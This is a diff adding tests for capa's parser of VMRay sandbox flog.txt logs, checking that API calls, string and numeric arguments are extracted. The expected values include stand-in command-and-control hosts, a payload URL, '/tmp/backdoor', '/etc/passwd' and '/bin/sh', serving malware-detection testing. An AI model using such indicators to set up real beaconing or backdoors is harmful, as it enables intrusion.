b/tests/test_vmray_flog_txt.py @@ -0,0 +1,424 @@ +# Copyright 2024 Google LLC +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. 
+# You may obtain a copy of the License at
+#
+#     https://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+
+"""Tests for VMRay flog.txt parser (#2452)."""
+
+from pathlib import Path
+
+import pytest
+
+import capa.features.common
+import capa.features.insn
+from capa.exceptions import UnsupportedFormatError
+from capa.features.extractors.vmray import flog_txt
+from capa.features.extractors.vmray.extractor import VMRayExtractor
+
+# Fixture files live in tests/fixtures/vmray/flog_txt/ (committed to the main repo so they
+# are always present in CI without requiring the capa-testfiles submodule).
+FLOG_TXT_FIXTURES = Path(__file__).resolve().parent / "fixtures" / "vmray" / "flog_txt"
+
+
+MINIMAL_FLOG_TXT = """
+# Log Creation Date: 08.10.2024 18:12:03
+# Analyzer Version: 2024.4.1
+# Flog Txt Version 1
+
+Process:
+id = "1"
+os_pid = "0x118c"
+os_parent_pid = "0x7d8"
+parent_id = "0"
+image_name = "svchost.exe"
+filename = "c:\\\\users\\\\test\\\\desktop\\\\svchost.exe"
+cmd_line = "\\"c:\\\\users\\\\test\\\\desktop\\\\svchost.exe\\" "
+monitor_reason = "analysis_target"
+
+Region:
+id = "125"
+name = "private_0x0000000000010000"
+
+Thread:
+id = "1"
+os_tid = "0x117c"
+ [0072.750] GetCurrentProcess () returned 0xffffffffffffffff
+ [0071.184] RegisterClipboardFormatW (lpszFormat="WM_GETCONTROLTYPE") returned 0xc1dc
+ [0066.433] CoInitializeEx (pvReserved=0x0, dwCoInit=0x2) returned 0x0
+"""
+
+
+def test_parse_flog_txt_minimal(tmp_path):
+    # Write as binary so newlines are exactly \n (avoids Windows \r\n)
+    path = tmp_path / "flog.txt"
+    path.write_bytes(
+        b"# Flog Txt Version 1\n\n"
+        b"Process:\n"
+        b'id = "1"\n'
+        b'os_pid = "0x118c"\n'
+        b'image_name = "svchost.exe"\n'
+        b'filename = "test.exe"\n'
+        b'monitor_reason = "analysis_target"\n'
+        b'parent_id = "0"\n'
+        b'os_parent_pid = "0"\n'
+        b'cmd_line = ""\n\n'
+        b"Thread:\n"
+        b'id = "1"\n'
+        b'os_tid = "0x117c"\n'
+        b" [0072.750] GetCurrentProcess () returned 0xffffffffffffffff\n"
+    )
+    flog = flog_txt.parse_flog_txt_path(path)
+    assert flog.analysis.log_version == "1"
+    assert len(flog.analysis.monitor_processes) == 1
+    proc = flog.analysis.monitor_processes[0]
+    assert proc.image_name == "svchost.exe"
+    assert proc.process_id == 1
+    assert proc.os_pid == 0x118C
+    assert len(flog.analysis.monitor_threads) == 1
+    thread = flog.analysis.monitor_threads[0]
+    assert thread.thread_id == 1
+    assert thread.process_id == 1
+    assert len(flog.analysis.function_calls) == 1
+    assert flog.analysis.function_calls[0].name == "GetCurrentProcess"
+
+
+def test_parse_flog_txt_rejects_wrong_header():
+    with pytest.raises(
+        UnsupportedFormatError, match=r"does not appear to be a VMRay flog\.txt"
+    ):
+        flog_txt.parse_flog_txt("not a flog\nProcess:\nid = 1\n")
+
+
+def test_parse_flog_txt_sys_prefix_stripped(tmp_path):
+    # Linux kernel calls start with sys_; parser should strip for consistency with XML
+    path = tmp_path / "flog.txt"
+    path.write_bytes(
+        b"# Flog Txt Version 1\n\n"
+        b'Process:\nid = "1"\nos_pid = "0x1000"\nparent_id = "0"\nos_parent_pid = "0"\n'
+        b'image_name = "sample"\nfilename = "x"\ncmd_line = ""\nmonitor_reason = "a"\n\n'
+        b'Thread:\nid = "1"\nos_tid = "0x2000"\n [0001.000] sys_time () returned 0x0\n'
+    )
+    flog = flog_txt.parse_flog_txt_path(path)
+    assert len(flog.analysis.function_calls) == 1
+    assert flog.analysis.function_calls[0].name == "time"
+
+
+def test_vmray_analysis_from_flog_txt(tmp_path):
+    path = tmp_path / "flog.txt"
+    path.write_bytes(
+        MINIMAL_FLOG_TXT.encode("utf-8").replace(b"\r\n", b"\n").replace(b"\r", b"\n")
+    )
+    from capa.features.extractors.vmray import VMRayAnalysis
+
+    analysis = VMRayAnalysis.from_flog_txt(path)
+    assert analysis.submission_name == "flog.txt"
+    assert analysis.submission_type == "unknown"
+    assert analysis.submission_meta is not None
+    assert analysis.submission_static is None
+    assert len(analysis.monitor_processes) == 1
+    assert len(analysis.monitor_process_calls) >= 1
+
+
+def test_vmray_extractor_from_flog_txt(tmp_path):
+    from capa.features.address import NO_ADDRESS
+
+    path = tmp_path / "flog.txt"
+    path.write_bytes(
+        MINIMAL_FLOG_TXT.encode("utf-8").replace(b"\r\n", b"\n").replace(b"\r", b"\n")
+    )
+    ext = VMRayExtractor.from_flog_txt(path)
+    assert ext.get_base_address() is NO_ADDRESS  # no base address from flog.txt
+    procs = list(ext.get_processes())
+    assert len(procs) == 1
+    threads = list(ext.get_threads(procs[0]))
+    assert len(threads) == 1
+    calls = list(ext.get_calls(procs[0], threads[0]))
+    assert len(calls) == 3
+
+
+def test_parse_flog_txt_args_parsed(tmp_path):
+    """API call arguments are parsed into Param objects for feature extraction."""
+    path = tmp_path / "flog.txt"
+    path.write_bytes(
+        b"# Flog Txt Version 1\n\n"
+        b'Process:\nid = "1"\nos_pid = "0x1000"\nparent_id = "0"\nos_parent_pid = "0"\n'
+        b'image_name = "sample"\nfilename = "x.exe"\ncmd_line = ""\nmonitor_reason = "a"\n\n'
+        b'Thread:\nid = "1"\nos_tid = "0x2000"\n'
+        b' [0001.000] CreateFile (lpFileName="test.exe", dwDesiredAccess=0x80000000) returned 0x4\n'
+        b" [0002.000] VirtualAlloc (lpAddress=0x0, dwSize=4096) returned 0x10000\n"
+        b" [0003.000] GetCurrentProcess () returned 0xffffffffffffffff\n"
+    )
+    flog = flog_txt.parse_flog_txt_path(path)
+    calls = flog.analysis.function_calls
+
+    # CreateFile: string param and numeric param
+    create_file = calls[0]
+    assert create_file.name == "CreateFile"
+    assert create_file.params_in is not None
+    params = {p.name: p for p in create_file.params_in.params}
+    assert "lpFileName" in params
+    assert params["lpFileName"].deref is not None
+    assert params["lpFileName"].deref.value == "test.exe"
+    assert "dwDesiredAccess" in params
+    assert params["dwDesiredAccess"].value == "0x80000000"
+
+    # VirtualAlloc: two numeric params
+    virtual_alloc = calls[1]
+    assert virtual_alloc.params_in is not None
+    va_params = {p.name: p for p in virtual_alloc.params_in.params}
+    assert va_params["lpAddress"].value == "0x0"
+    assert va_params["dwSize"].value == "4096"
+
+    # no-arg call: params_in should be None
+    get_proc = calls[2]
+    assert get_proc.name == "GetCurrentProcess"
+    assert get_proc.params_in is None
+
+
+# ---------------------------------------------------------------------------
+# Fixture-based feature-presence tests
+# ---------------------------------------------------------------------------
+# These tests load the realistic flog.txt fixtures from tests/fixtures/vmray/flog_txt/
+# and verify that the extractor yields the expected capa features. They act as
+# regression tests for the parser — especially the string-argument parsing path,
+# which is brittle — and mirror the pattern used by test_vmray_features.py.
+
+
+def _collect_all_call_features(ext: VMRayExtractor) -> set:
+    """Collect every feature emitted at the call scope across all processes."""
+    return {
+        feature
+        for ph in ext.get_processes()
+        for th in ext.get_threads(ph)
+        for ch in ext.get_calls(ph, th)
+        for feature, _addr in ext.extract_call_features(ph, th, ch)
+    }
+
+
+def _collect_call_features_for_process(ext: VMRayExtractor, image_name: str) -> set:
+    """Collect call-scope features only for the process whose image_name matches."""
+    # filter on the process first so threads/calls of other processes are never walked
+    return {
+        feature
+        for ph in ext.get_processes()
+        if ph.inner.image_name == image_name
+        for th in ext.get_threads(ph)
+        for ch in ext.get_calls(ph, th)
+        for feature, _addr in ext.extract_call_features(ph, th, ch)
+    }
+
+
+# --- windows_apis.flog.txt ---------------------------------------------------
+
+
+@pytest.fixture(scope="module")
+def windows_apis_extractor():
+    path = FLOG_TXT_FIXTURES / "windows_apis.flog.txt"
+    return VMRayExtractor.from_flog_txt(path)
+
+
+def test_windows_flog_txt_process_count(windows_apis_extractor):
+    """Two processes are described in windows_apis.flog.txt."""
+    procs = list(windows_apis_extractor.get_processes())
+    assert len(procs) == 2
+
+
+def test_windows_flog_txt_api_features(windows_apis_extractor):
+    """Common Win32 API names are yielded as API features."""
+    features = _collect_all_call_features(windows_apis_extractor)
+    for api_name in (
+        "CreateFileW",
+        "RegOpenKeyExW",
+        "InternetOpenW",
+        "InternetConnectW",
+        "VirtualAlloc",
+        "CreateMutexW",
+        "LoadLibraryW",
+        "CreateProcessW",
+        "HttpOpenRequestW",
+        "WinHttpConnect",
+        "GetAddrInfoW",
+        "GetComputerNameW",
+    ):
+        assert (
+            capa.features.insn.API(api_name) in features
+        ), f"API({api_name!r}) not found"
+
+
+def test_windows_flog_txt_string_args(windows_apis_extractor):
+    """String arguments are extracted and backslash-escaping is correctly unwound."""
+    features = _collect_all_call_features(windows_apis_extractor)
+    for expected_string in (
+        # CreateFileW lpFileName (double-backslash in flog → single backslash in feature)
+        "C:\\Users\\test\\Documents\\config.ini",
+        # RegOpenKeyExW lpSubKey
+        "Software\\Microsoft\\Windows\\CurrentVersion\\Run",
+        # InternetOpenW lpszAgent
+        "Mozilla/5.0 (Windows NT 10.0)",
+        # InternetConnectW lpszServerName
+        "evil.example.com",
+        # CreateMutexW lpName
+        "Global\\MyMutex12345",
+        # LoadLibraryW lpLibFileName
+        "kernel32.dll",
+        # HttpOpenRequestW verb and path
+        "GET",
+        "/beacon",
+        # WinHttpConnect pswzServerName
+        "c2.example.org",
+        # WinHttpOpenRequest verb
+        "POST",
+        # GetComputerNameW result (child process)
+        "DESKTOP-TEST01",
+    ):
+        assert (
+            capa.features.common.String(expected_string) in features
+        ), f"String({expected_string!r}) not found"
+
+
+def test_windows_flog_txt_string_double_backslash_absent(windows_apis_extractor):
+    """Double-escaped backslashes (as they appear in the raw flog.txt) must NOT appear in features."""
+    features = _collect_all_call_features(windows_apis_extractor)
+    # The raw flog.txt content has C:\\Users\\...; the extractor must normalise to single backslash
+    assert (
+        capa.features.common.String("C:\\\\Users\\\\test\\\\Documents\\\\config.ini")
+        not in features
+    )
+
+
+def test_windows_flog_txt_number_args(windows_apis_extractor):
+    """Numeric arguments are extracted as Number features."""
+    features = _collect_all_call_features(windows_apis_extractor)
+    # VirtualAlloc dwSize
+    assert capa.features.insn.Number(4096) in features
+    # VirtualAlloc flAllocationType
+    assert capa.features.insn.Number(0x3000) in features
+    # VirtualAlloc flProtect
+    assert capa.features.insn.Number(0x40) in features
+    # CreateFileW dwDesiredAccess
+    assert capa.features.insn.Number(0x80000000) in features
+
+
+def test_windows_flog_txt_child_process(windows_apis_extractor):
+    """The spawned child process (cmd.exe) is present and has its own API calls."""
+    features = _collect_call_features_for_process(windows_apis_extractor, "cmd.exe")
+    assert capa.features.insn.API("NtQueryInformationProcess") in features
+    assert capa.features.insn.API("GetUserNameW") in features
+    # GetUserNameW lpBuffer string
+    assert capa.features.common.String("test") in features
+
+
+# --- linux_syscalls.flog.txt -------------------------------------------------
+
+
+@pytest.fixture(scope="module")
+def linux_syscalls_extractor():
+    path = FLOG_TXT_FIXTURES / "linux_syscalls.flog.txt"
+    return VMRayExtractor.from_flog_txt(path)
+
+
+def test_linux_flog_txt_sys_prefix_stripped(linux_syscalls_extractor):
+    """sys_ prefix is stripped from all Linux syscall names."""
+    features = _collect_all_call_features(linux_syscalls_extractor)
+    # Every syscall name should appear WITHOUT the sys_ prefix
+    for stripped_name in (
+        "read",
+        "write",
+        "open",
+        "connect",
+        "socket",
+        "execve",
+        "fork",
+        "getuid",
+        "setuid",
+        "chmod",
+        "unlink",
+        "time",
+        "ptrace",
+        "prctl",
+        "mmap",
+        "mprotect",
+        "munmap",
+        "bind",
+        "listen",
+        "accept",
+        "sendto",
+        "recvfrom",
+    ):
+        assert (
+            capa.features.insn.API(stripped_name) in features
+        ), f"API({stripped_name!r}) not found after stripping"
+
+
+def test_linux_flog_txt_sys_prefix_not_present(linux_syscalls_extractor):
+    """sys_-prefixed names must NOT appear in features (only the stripped form)."""
+    features = _collect_all_call_features(linux_syscalls_extractor)
+    assert capa.features.insn.API("sys_open") not in features
+    assert capa.features.insn.API("sys_execve") not in features
+
+
+def test_linux_flog_txt_string_args(linux_syscalls_extractor):
+    """String path arguments from Linux syscalls are extracted correctly."""
+    features = _collect_all_call_features(linux_syscalls_extractor)
+    assert capa.features.common.String("/etc/passwd") in features
+    assert capa.features.common.String("/bin/sh") in features
+    assert capa.features.common.String("/tmp/backdoor") in features
+    assert capa.features.common.String("/tmp/.hidden") in features
+
+
+# --- string_edge_cases.flog.txt -----------------------------------------------
+
+
+@pytest.fixture(scope="module")
+def string_edge_cases_extractor():
+    path = FLOG_TXT_FIXTURES / "string_edge_cases.flog.txt"
+    return VMRayExtractor.from_flog_txt(path)
+
+
+def test_edge_case_paths_with_spaces(string_edge_cases_extractor):
+    """File paths containing spaces are parsed correctly."""
+    features = _collect_all_call_features(string_edge_cases_extractor)
+    assert (
+        capa.features.common.String("C:\\path with spaces\\file name.txt") in features
+    )
+
+
+def test_edge_case_unc_path(string_edge_cases_extractor):
+    """UNC paths (\\\\server\\share) are parsed correctly."""
+    features = _collect_all_call_features(string_edge_cases_extractor)
+    assert capa.features.common.String("\\\\server\\share\\document.docx") in features
+
+
+def test_edge_case_url_string(string_edge_cases_extractor):
+    """Full URL strings are preserved as-is."""
+    features = _collect_all_call_features(string_edge_cases_extractor)
+    assert capa.features.common.String("https://c2.example.com/payload.bin") in features
+
+
+def test_edge_case_registry_key(string_edge_cases_extractor):
+    """Registry key paths are normalised to single backslashes."""
+    features = _collect_all_call_features(string_edge_cases_extractor)
+    assert (
+        capa.features.common.String("Software\\Microsoft\\Windows NT\\CurrentVersion")
+        in features
+    )
+
+
+def test_edge_case_numeric_args(string_edge_cases_extractor):
+    """Numeric arguments from edge-case calls are extracted."""
+    features = _collect_all_call_features(string_edge_cases_extractor)
+    # send() len=256
+    assert capa.features.insn.Number(256) in features
+    # recv() len, CryptHashData dwDataLen and WriteProcessMemory nSize are all 4096 in
+    # the fixture, so a single membership check covers them; asserting the same value
+    # twice cannot tell the calls apart.
+    assert capa.features.insn.Number(4096) in features